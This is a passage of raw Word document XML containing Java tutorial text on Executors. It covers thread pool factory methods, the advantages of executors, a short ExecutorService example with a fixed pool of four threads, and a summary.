    <w:p w14:paraId="20DFD55D" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creates a thread pool that creates new threads as needed, but reuses previously constructed threads when they are available. It is ideal for handling many short-lived asynchronous tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46091319" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>newSingleThreadExecutor()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E7667" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creates an executor that uses a single worker thread to execute tasks sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428142D5" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Useful when you need to ensure that tasks are executed one after the other in a single-threaded manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EDB10E" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>newScheduledThreadPool(int corePoolSize)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE5176" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creates a thread pool that can schedule tasks with a fixed-rate or fixed-delay execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77DA95" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used for executing periodic tasks at specified intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309613F" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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Advantages of Using Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E46808" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77D2F3" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors use thread pools, which reduces the overhead of creating and destroying threads repeatedly. This improves performance by reusing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4782A" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Simplified Code</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2AC77" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors abstract away the complexities of manually creating, managing, and terminating threads. This simplifies concurrent programming, making the code cleaner and less error-prone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FF1677" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Improved Resource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230DA6C7" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors help manage the number of concurrent threads and ensure that system resources (like CPU and memory) are used efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC3E813" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For example, a FixedThreadPool can ensure that no more than a specified number of threads run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAAFB31" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Graceful Shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D735BEC" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors provide methods such as shutdown() and shutdownNow() to gracefully terminate the threads, ensuring that the tasks are completed before shutting down the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A2D65" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC7287" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors can handle exceptions thrown by tasks and can manage retries or logging, making it easier to manage task failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452822F" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58F015" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors can schedule tasks to run after a certain delay or periodically, making them suitable for tasks such as background services, cron-like jobs, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF3982" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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Example: Using Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E0EEF"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Here’s an example demonstrating the usage of an ExecutorService to manage a pool of threads and submit tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099FD772"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418E430" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F6F2FB"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public class ExecutorExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D47673" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED10FDC"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A7551"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Create an ExecutorService with a fixed thread pool of 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A536AC8"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ExecutorService executorService = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D346A01"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7ED358B0"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Submit tasks to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE5E36"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for (int i = 0; i &lt; 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15710447"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executorService.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDD649"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD274BB"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Simulate task execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4E4FB"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Thread.currentThread().getName() + " is executing a task.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226129C2"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hread.sleep(1000); // Simulating work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BB047"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF63B20"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4748B0"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4BBC70C3"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173EC71A"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5E68F740"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7BE24509"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Shutdown the executor service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F74F7"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executorService.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6E399"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29464371" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07961E3F" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25130259" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java provide a higher-level, easier-to-use alternative to managing threads manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654DD14B" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>They improve resource management, simplify concurrent programming, and make thread creation, scheduling, and execution more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75631697" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By using </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other executor implementations, developers can improve performance, scalability, and maintainability of concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE56A0F" w14:textId="73C16508" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
